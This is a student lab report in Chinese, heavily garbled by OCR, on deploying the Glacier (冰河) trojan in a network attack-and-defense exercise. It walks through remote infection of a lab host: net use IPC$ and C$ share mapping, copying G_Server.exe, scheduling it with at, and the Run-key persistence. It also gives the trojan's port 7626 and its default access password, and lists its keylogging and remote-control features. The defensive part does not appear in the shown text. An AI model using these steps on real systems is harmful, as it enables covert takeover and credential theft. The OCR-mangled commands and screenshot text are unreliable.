2023年冰河木馬實驗報告

實驗報告

實驗名稱網(wǎng)絡攻防綜合實驗指導教師李曙紅

實驗類型設計實驗學時2實驗時間2023.06.29

一、實驗目的

1.。本次實驗為考核算驗，需要獨立設計完畢一次網(wǎng)絡攻防的綜合實驗?設計的實驗中要涉及以下幾個方面

內(nèi)容：

(1)構建一個具有漏洞的服務器,運用漏洞對服務器進行入侵或襲擊；

(2)。運用網(wǎng)絡安全工具或設備對入侵與襲擊進行檢測；

(3)能有效的對漏洞進行修補，提高系統(tǒng)的安全性,避免同種襲擊的威脅。

2網(wǎng)絡攻防綜合實驗將從實驗設計、實驗過程、實驗結果、實驗報告幾個方面，對學生的綜合實驗能力進

行考核與評分，具體評分標準參考“評分標準”文檔。

二、實驗規(guī)定

1.2人一組，規(guī)定每人分工不同，例如一人負責網(wǎng)絡襲擊,一個負責網(wǎng)絡防范。在實驗過程和實驗報告中要體

現(xiàn)兩人的不同分工。

2.每組獨立設計完畢實驗，不能雷同。

3.實驗過程中以下三個階段需上機演示給指導老師察看：完畢網(wǎng)絡襲擊、檢測到襲擊、完畢網(wǎng)絡防范。

4.完畢實驗報告，能解釋在實驗使用到的技術或工具的基本原理。

三、實驗環(huán)境

可以自由使用信息安全實驗室的PC機，局域網(wǎng),Linux服務器,Windows服務器，防火墻，入侵檢測系統(tǒng)

等。

四、實驗設計方案、實驗過程及實驗結果

作為一款流行的遠程控制工具，在面世的初期，冰河就曾經(jīng)以其簡樸的操作方法和強大的控制

力令人膽寒，可以說達成了談冰色變的地步。鑒于此，我們就選用冰河完畢本次實驗。

若要使用冰河進行襲擊，則冰河的安裝（是目的主機感染冰河）是一方面必須要做的。

冰河控制工具中有三個文獻：Readme,txt,G—Client.exe,以及G_Server.exeo

Readme.txt簡樸介紹冰河的使用。G_ClienTexe是監(jiān)控端執(zhí)行程序,可以用于監(jiān)控遠程計

算機和配置服務器。G_Server.exe是被監(jiān)控端后臺監(jiān)控程序（運營一次即自動安裝,開機自啟動,

可任意改名，運營時無彳壬何提醒）。運營G_Server.exe后，該服務端程序直接進入內(nèi)存,并把感染機

的7626端口開放。而使用冰河客戶端軟件（G_C1lent.exe）的計算機可以對感染機進行遠程

控制。

冰河木馬的使用：

1、自動跟蹤目的機屏幕變化，同時可以完全模擬鍵盤及鼠標輸入，即在同步被控端屏幕變化的

同時，監(jiān)控端的一切鍵盤及鼠標操作將反映在被控端屏幕（局域網(wǎng)合用）。

2、記錄各種口令信息：涉及開機口令、屏?？诹?、各種共享資源口令及絕大多數(shù)在對話框中出

現(xiàn)的口令信息。

3、獲取系統(tǒng)信息:涉及計算機名、注冊公司、當前用戶、系統(tǒng)途徑、操作系統(tǒng)版本、當前顯示

分辨率、物理及邏輯磁盤信息等多項系統(tǒng)數(shù)據(jù)。

4、限制系統(tǒng)功能:涉及遠程關機、遠程重啟計算機、鎖定鼠標、鎖定系統(tǒng)熱鍵及鎖定注冊表等

多項功能限制。

5、遠程文獻操作:涉及創(chuàng)建、上傳、下載、復制、傷處文獻或目錄、文獻壓縮、快速瀏覽文本

文獻、遠程打開文獻（正常方式、最小化、最大化、隱藏方式）等多項文獻操作功能。

6、注冊表操作:涉及對主鍵的瀏覽、增刪、復制、重命名和對鍵值的讀寫等所有注冊表操作功

能。

7、發(fā)送信息：以四種常用圖標向被控端發(fā)送簡短信息。

8、點對點通訊：以聊天室形式同被控端進行在線交談等。

實驗過程：

一、襲擊

1、入侵目的主機

一方面運營G_C1ient.exe,掃描主機。

查找IP地址:在“起始域”編輯框中輸入要查找的IP地址，例如欲搜索IP地址“10.1.1

3.1”至“10.1.13..255”網(wǎng)段的計算機，應將“起始域”設為“192.168.1”，將“起始地

址”和“終止地址”分別設為“1”和“255”（由于我們是在宿舍做的，IP地址在100?120之間），

然后點“開始搜索”按鈕，在右邊列表框中顯示檢測到已經(jīng)在網(wǎng)上的計算機的IP地址。

從上圖可以看此搜索結果中，每個IP前都是ERR。地址前面的“ERR:”表達這臺計算機無法

控制。

所以，為了可以控制該計算機，我們就必須要讓其感染冰河木馬。

1、遠程連接

使用Dos命令：netuse\\ip\ipc$

如下圖所示：

a命令提示符-1□1x|

S

!C：XDocunentsandSettingsXAdninistrator>netuseW10.1.13.214\ipc$

命令成功完成。

C:\DocumentsandSettingsX^dninistrator>netuseX：\\10.1.13.214\C$

命令成功完成。

XDocunentsandSettingsXAdninistratoi*>)

bd

2、磁盤映射。

本實驗:將目的主機的C:盤映射為本地主機上的X:盤

如下圖所示

機命令提示符-Inlx

C：\DocunentsandSettingsXHdninistratoi*>netuse\\10.1.13.214\ipc$

I命令成功完成。

C：XDocunentsandSettings\Adninistrator>netuseX：W10.1.13.214\C$

命令成功完成。

C：\DocumentsandSettings\Adninistrator^

bd

X,to.1.13.214,上的C$a：）

文件更）編輯量）查看9收藏?工具（X）幫助國）

Q后退,1?十|/搜索文件夾I因^

地址@）|^gXA30^

文件和文件夾任務會§122口123

J創(chuàng)建一個新文件夾

通將這個文件夾發(fā)布到

Webab□caonima

其它位置*

Dev-Cppdiyitidiyiti1

我的電腦J

我的文檔

Documentsand

共享文檔HL-232-340Intel

Settings

網(wǎng)上鄰居口

KeilProgramFilesProgramData

詳細信息V口

tctestJtext

thirdwWINDOWS

新建文件夾HinRAR壓縮文件g^client.ex

1,721KB

JLink.logmain,c

寸木寸擋r*rcmiyroF；1a

26個對象OJD1個隱藏對象）怙.12MB-[QIntern

3、將本地主機上的G_Server.exe拷貝到目的主機的磁盤中，并使其自動運營。

如下圖所示：

X,to.1.13.214,上的C$a：)-1□!

文件更）編輯⑥查看9收藏?工具豆）幫助國）________________________________________________

Q后退,|/搜索文件夾|因,

地址@)|*x：\30^

文件和文件夾任務會

123

J創(chuàng)建一個新文件夾

通將這個文件夾發(fā)布到

?Webcaomma

其它位置*

diyiti1

我的電腦

我的文檔

IDocumentsand

共享文檔一JHL-232-340Intel

Settings

網(wǎng)上鄰居

ProgramFilesProgramData

詳細信息

text

26個對象OJOI個隱藏對象）

上圖中，目的主機的C盤中沒有G_Server.exe程序存在。

此時，目的主機的C盤中已存在冰河的G_Server.exe程序，使用D。s命令添加啟動事件，如下圖

所示：

上TO.1.13.214'上的C$CX：)/0I.

文件①)編輯量)查看(V)收藏&)工具(T)幫助出)|,中

。局8▼。▼優(yōu)|戶搜索文豚|國：_________

地址@)fex\3H轉到

1U

文件和文件夾任務會n

0創(chuàng)建一個新文件夾

/Dev-Cppdiyiti1

d將這個文件夾發(fā)布到

?Web

IDocumentsand

Intel

\Settings

其它位置會

4我的電腦

/KeilProgramData

Q我的文檔

o共享文襠

T網(wǎng)上鄰居

1tctext

詳細信息㈡P

thirdwiinjows

㈡國

靛:6姬批處理文件

新建文件夾

1KB

畫

G_Server.exeJLink.logmain,c

MicrosoftGi)Win.文本文檔Csourcefile

HMicrosoft公司01KBc1KB

復件aaa.bat

MS-DOS批處理文件

1KB

zs個對象Sui個隱藏對象)1.94MB@Internet

一方面，獲取目的主機上的系統(tǒng)時間，然后根據(jù)該時間設立啟動事件。

此時，在目的主機的Dos界面下，使用at命令，可看到:

菽命令提示符

登錄失?。何粗挠脩裘蝈e誤密科。

C:\DocumentsandSettingsX^dninistrator>netuseW10.1.13.214\ipc§

命令成功完成。

C：\DocunentsandSettingsXfidninistrator>netuseX:W10.1.13.214\C§

命令成功完成。

C：\DocunentsandSettingsXAdninistrator>nettine\\10.1.13.214

\\10.1.13.214的當前時間是2016/6/29上午04：56

命令成功完成。

C：\DocumentsandSettingsXAdninistratoi*>atW10.1.13.21404：56C：\\G_Seruer

新加了一項作業(yè)，其作業(yè)ID=1

C：\DocunentsandSettings\Adninistratoi*>at

列表是空的。

C："ocumentsandSettings3dm:Lnistrator).

下圖為設定期間到達之前(即G_Server.exe執(zhí)行之前)的注冊表信息，可以看到在注冊

表下的：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,其默

認值并無任何值。

/er2003EnterpriseEdition?VMwareWorkstation

查看(V)慮擬機(M)分組(T)?n(W)幫助(H)Bones?aa?Ha?igiSBH

^J^^Wjndow^e^e^OoTEntT?1

品WindowsXPProfessionalX

當目的主機的系統(tǒng)時間到達設定期間之后，G_Server.exe程序自動啟動，且無任何提醒。

;Server2003EnterpriseEdition-VMwareWorkstation

■M（v）SXIVUM）劍BCD皿帥g■叩Oe二回直圓口SBH如③

fiUbuntuWindowsServer2003Ent-’、；與WindowsXPProfessionalX

；注冊表編輯器三回兇

文件9磐汽藏夾?幫助QI）

__IKununcoT嘮默認）C:\VINDOTS\xyst.EXE

IRunOnceEx.J-

__JRunServices回PMIME2002AREG.SZC:\WIND0tS\syster*32\IME\TINTLGNT\nHrSETP.E.

S-_JSetup

ME2002ASyncREG_SZC:\WINDOTS\Syst?r?32\UIE\TINTU；NT\TINrSETP,E.

二|Sh?r?dDllsareToolsREG_SZ"C:\Progra?Files\VMwar?\VMitareToolsWMwar.

SI1ShellExtensions回VWwareUserProcessREG_SZ“C:\FrogranFiles\VMware\VM?areTool姑恤ar.

ShellConpatibility

ShellScrap

_3Sh?llS?rvic?ObjactD?l?yLoad

從上圖可以看到，HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre

ntVersion\Run的默認值發(fā)生了改變。

變成了：C:\\WINDOWSWSYSTEM\\Kernel32.exe

這就說明冰河木馬安裝成功，擁有G_Client.exe的計算機都可以對此計算機進行控制了。

此時，再次使用G_C1ient.exe搜索計算機，可得結果如下圖所示:

從搜索結果可以看到，我們剛安裝了冰河木馬的計算機（其IP：10.1.13,214）的IP地址前

變成了“OK：”，而不是之前的“ERR:"。

下面對該計算機進行連接控制:

VMwareWorkstation

【機(M)分組(T)除口(W)部助(H)B30QJ吟2?1彈EJEDH彈③

文件電)編輯電)

沱冰河V2.2[DARKSUN專版]

。后退◎

文件［R］編輯［的設置&J幫助⑻

地址9)回

C:\Documont居里嗡CKe

文件和文件夾任務題題國安

應用6】［

一當前連接：|192168.1112端口：［7628—也問口令：f

里命名這個文件_rJ

分

0移動這個文件口文件營理器I電命令控制臺I

復需怩個文件

我的電腦一文件名稱F件大小(字節(jié))最后更新時間

9將這個文件發(fā)布至LocalHost

以電子郵件形式學+(192.168.1.112

X文件

刪除這個文件

其它位置

我的文檔

共享文檔

我的電腦

網(wǎng)上鄰居

詳細信息

口令有誤，拒絕執(zhí)行命令

上圖顯示，連接失敗了，為什么呢？其實因素很簡樸，冰河木馬是訪問口令的，且不同版本的訪

問口令不盡相同，本實驗中，我們使用的是冰河V2.2版,其訪問口令是05181977,當我們在訪

問口令一欄輸入該口令(或者右擊“文獻管理器”中的該IP,“修改口令”)，并點擊應用，即可連接

成功。

al-VMwareWorkstation

鴕機(M)分組(T)SD(W)幫助(H):■叩叵I與；目強於：旺亙回口「百面畫"色駕

XWindowsServer2003Enterpri,..X臣WindowsXPProfessional

冰河

文件隹〕編輯(￡)

冰河V2.2[DARKSUH專版]

。后退?0

文件［已編輯國］設置修］幫助3

地址①)3c：

文件和文件夾任務*

當前連接：|192168.11123端口：商訪問口令：,*******應用⑸|

重命名這個文件r［

移動這個文件口文件管理器|電命令控制臺|

復制這個文件

繆我的電腦文件名稱I文件大小序節(jié))最后更新時間

將這個文件發(fā)布至LocalMost

叁

以電子郵件花式3192.168.1.112Documentsand

文件日困

IInetpub

刪除這個文件+CjDocTimentsand

ProgramFiles

[+：口Inetpub

_JSystemVolume

+|__JProgramFiles

2JWINBOWS

其它位置+口SystemVolume

~1wmpub

+QWINDOWS

桌面回AUTOEXEC.BAT02011-10-3014:56:00

>Cjwmpub

我的文檔回bootini1922011-10-3014:45:42

旬bootfont,bin3227302003-3-2720:00:00

共享文檔

回CONFIG.SYS02011-10-3014:56:00

我的電腦

同G_Server.exe2663832000-7-1023:15:56

網(wǎng)上鄰居詞10.SYS02011-10-3014:56:00

同MSDOS.SYS02011-10-3014:56:00

MlNTDETECT.COM475482003-3-2720:00:00▼

詳細信息

共有16個對象

連接成功了，我們就可以在“命令控制臺”下對該計算機進行相關的控制操作了。

比如說：

1、屏幕控制。

圖像格式有BMP和JEPG兩個選項，建議你選JEPG格式，由于它比較小,便于網(wǎng)絡傳輸?！皥D像

色深”第一格為單色，第二格為16色，第三格為256色，依此類推?！皥D像品質”重要反映的是圖像

的清楚度。按“擬定”按鈕后便出現(xiàn)遠程計算機的當前屏幕內(nèi)容。

%冰河V2.2[DARKSUN專版]Io回I表.1

文件的編輯［E］設置［G］幫助［H］

&國0

當前連接：iLocalHost三］端口：1^626訪問口令：I應用［S］

-J文件管理器與命令控制臺

令

類命令

&口

制

類命令

@s控

絡

類命令

網(wǎng)

S--

件

類命令

E--s文

S--

S-由-

冊

表讀寫

注

置

類命令

a設

清從左側列表中選擇相關命令

設立相關屬性

■WindowsXPProfessional-VMwareWorkstation

文件都查號(V)虛擬機(M)分組(T)窗口(W)幫助(H)■la1330?IE）回直）（3陰

WindowsXPProfessional-VMwereWorkstation

文件侏a?s（v）4m（M）ja（T）ea（w）分期舊）B加⑦⑥：3"心藥門而?I回回值

■.蜜怙用X虛ubuifjX屆\Yn3vs5er，”.”0：B-tCT，;…X[時

r用像R示即回立

立伴修?ia<E）連專但）他）[R（I）*6bQfiI薩

。后遢?.t

文件再土小I盤故I修改RWII■性I

---------------------------------文

3臬面FrD"3s、<、willS?iGik?>>:20111030匕00

文

口in“氤2011-10-301530

m文

口Prob**FI1?B2011-10-311415R

5丫班9名夠文

國235次叁（*：）Onjroo/s文2011-10-301532

BJ3本地電史（C.）C）s22011-10-301458

回

圖3DVD而動IS（D:）G_Serv?r.?x?